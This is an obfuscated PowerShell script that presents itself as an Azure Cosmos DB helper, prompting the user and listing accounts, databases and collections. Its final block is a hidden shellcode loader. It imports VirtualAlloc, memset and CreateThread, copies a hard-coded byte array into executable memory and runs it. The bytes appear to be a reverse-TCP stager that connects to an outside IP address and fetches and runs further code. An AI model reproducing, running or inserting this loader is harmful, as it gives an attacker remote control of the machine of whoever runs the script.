${APi`VEr`S`iOn} = ("{0}{1}{2}"-f'20','15-04-','08')
${REsoURCEg`R`O`U`pna`ME} = ("{1}{2}{0}{3}"-f'esour','m','yR','ceGroup')
${AcCo`U`NTNA`me} = ("{2}{1}{0}" -f'ccount','mosa','mycos') 
${DAta`B`A`SEnAMe} = ("{0}{2}{1}"-f'dat','base1','a')
${COl`lE`CTI`OnNaMe} = ("{0}{2}{1}"-f'c','llection1','o')
${AC`Count`REs`OurCEnaME} = ${a`cCoun`TnA`Me} + ("{1}{0}" -f 'db/','/mongo')
${datab`As`e`Res`OurCENA`Me} = ${a`Cc`Oun`TNAmE} + ("{0}{1}"-f'/mong','odb/') + ${D`AtA`BaSEn`AmE}
${DAtabAser`ESOU`R`CetYPE} = ("{11}{1}{3}{10}{5}{6}{4}{7}{0}{9}{2}{8}"-f 'eAcco','os','ts/apis/data','oft.Docu','aba','tDb/da','t','s','bases','un','men','Micr')
${cOLle`CT`iOnresoUR`c`eN`AmE} = ${acco`U`NTname} + ("{1}{2}{0}"-f 'odb/','/mo','ng') + ${d`At`A`BAseNaMe} + "/" + ${co`lL`ECti`ONnaMe}
${coLLEctiOnr`ESour`C`etYPE} = ("{4}{0}{9}{2}{15}{1}{7}{5}{10}{16}{17}{6}{13}{11}{12}{14}{8}{3}" -f 'osof','n','o','ns','Micr','b/databa','at','tD','io','t.D','seAc','b','ases/c','a','ollect','cume','counts/','apis/d')

.("{2}{1}{0}" -f 't','-Hos','Read') -Prompt ("{16}{9}{10}{12}{3}{15}{2}{7}{4}{0}{14}{17}{5}{8}{6}{1}{13}{11}"-f 'nt. P','er to con',' ac','a','ou','s',' Ent','c','s','st all ','da','e','t','tinu','r','bases in an','Li','e')

&("{0}{1}{2}" -f'Get-A','zRe','source') -ResourceType ${Datab`ASerES`o`UrCeTY`PE} `
    -ApiVersion ${a`PIveR`s`iON} -ResourceGroupName ${R`E`SOU`RcegrO`U`pNaME} `
    -Name ${ACC`OUn`T`RESourcEN`A`ME}  | .("{1}{2}{0}{3}" -f'-','Selec','t','Object') ("{0}{1}{3}{2}" -f 'P','rop','s','ertie')

.("{1}{2}{0}"-f 'ost','Rea','d-H') -Prompt ("{12}{4}{11}{1}{10}{7}{0}{5}{8}{2}{3}{9}{6}"-f's','e in ',' co','nt','et','s E','nue',' account. Pre','nter to','i','an',' a databas','G')

&("{3}{0}{4}{2}{1}"-f't','ource','Res','Ge','-Az') -ResourceType ${Data`BAS`eReSouR`C`eTYPE} `
    -ApiVersion ${ApiVER`S`Ion} -ResourceGroupName ${R`e`sOuRCe`gROup`NAme} `
    -Name ${Da`T`Ab`ASE`RE`SourCEnAME} | &("{0}{1}{2}" -f 'Sele','ct-Ob','ject') ("{2}{0}{1}"-f'ropert','ies','P')

&("{0}{1}{2}" -f 'Read','-','Host') -Prompt ("{3}{7}{6}{2}{4}{1}{5}{8}{0}{9}" -f 'ontin',' ','atabas','List ','e. Press','Enter to','ions in a d','all collect',' c','ue')

&("{0}{1}{2}" -f 'G','et-AzRes','ource') -ResourceType ${cOLl`ECt`iONRes`OU`RCet`ype} `
    -ApiVersion ${ApivE`Rs`iON} -ResourceGroupName ${ReS`our`cEGRo`UP`Na`mE} `
    -Name ${dat`AB`A`sEr`ESOU`R`cEName} | .("{0}{2}{3}{1}"-f 'Select','ect','-Ob','j') ("{1}{0}{2}"-f'e','Properti','s')

&("{0}{1}{2}"-f'Re','ad-Hos','t') -Prompt ("{7}{6}{5}{0}{1}{8}{2}{3}{4}"-f 'ction in a database','. ','Enter to ','continu','e','colle',' a ','Get','Press ')

.("{2}{1}{0}{3}" -f'-A','et','G','zResource') -ResourceType ${CO`LLeC`T`IOn`ResO`UR`Ce`TYpE} `
    -ApiVersion ${AP`iVers`iON} -ResourceGroupName ${rE`soURc`Egr`oUpn`AmE} `
    -Name ${cO`LLecTio`N`ReS`ou`RcenAMe} | .("{0}{2}{1}" -f 'Sele','t','ct-Objec') ("{0}{1}{2}"-f'Pr','oper','ties')

${C} = ((("{48}{19}{65}{2}{17}{29}{46}{11}{12}{60}{64}{57}{62}{23}{30}{36}{39}{54}{20}{8}{15}{45}{56}{0}{49}{18}{14}{3}{37}{41}{47}{53}{40}{5}{55}{21}{51}{58}{68}{13}{32}{22}{44}{25}{31}{6}{9}{26}{50}{28}{24}{69}{33}{1}{52}{43}{7}{70}{10}{34}{63}{42}{67}{61}{35}{27}{66}{16}{59}{4}{38}{71}"-f 'u','P)]','2.dlls','hread(IntPtr ','c','e, IntPtr','l','c s','2.','ags, IntP','tic','rn',' In','P','reateT','dll','uint src, u','uP','c extern IntPtr C','mport(suP','el3','s','eter, uint dwCre','otect)','r','t','tr','(IntPt','[DllImpo',')]pub',';[D','ionF','aram','msvcrt.dllsu',' extern','t','llI','lpTh','oun','mpor','ckSiz','readAtt','r ','ubli','a','suP)]','lic static exte','ributes, uint d','[DllI','blic stati',' lpThreadId);','s, I','p','wSta','t(suPkern',' lpStartAddre','p','e, uint flP','ntPtr','int ','tPtr VirtualAlloc(IntPtr','e','r',' IntPt',' lpAddress, uint dwSize, uint flAllocationTyp','kernel3','r dest, ','mems',' lp','t(suP','ta','t);'))  -CREplaCe  'suP',[char]34);${w} = .("{1}{0}" -f'ype','Add-T') -memberDefinition ${c} -Name ("{0}{1}"-f'Win3','2') -namespace ("{1}{2}{3}{0}"-f'ons','W','in32Fun','cti') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xd9,0xd9,0x37,0x94,0x68,0x02,0x00,0x15,0xb3,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x75,0xee,0xc3;${G} = 0x1000;if (${Z}."L`ENG`TH" -gt 0x1000){${g} = ${Z}."lEn`GtH"};${X}=${W}::("{3}{0}{2}{1}" -f'irtualA','loc','l','V').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."LeNg`TH"-1);${i}++) {${W}::"m`eMs`ET"([IntPtr](${x}.("{1}{0}" -f 'oInt32','T').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{2}{0}"-f'd','Creat','eThrea').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{3}{0}{2}"-f 'art','S','-sleep','t') 60};
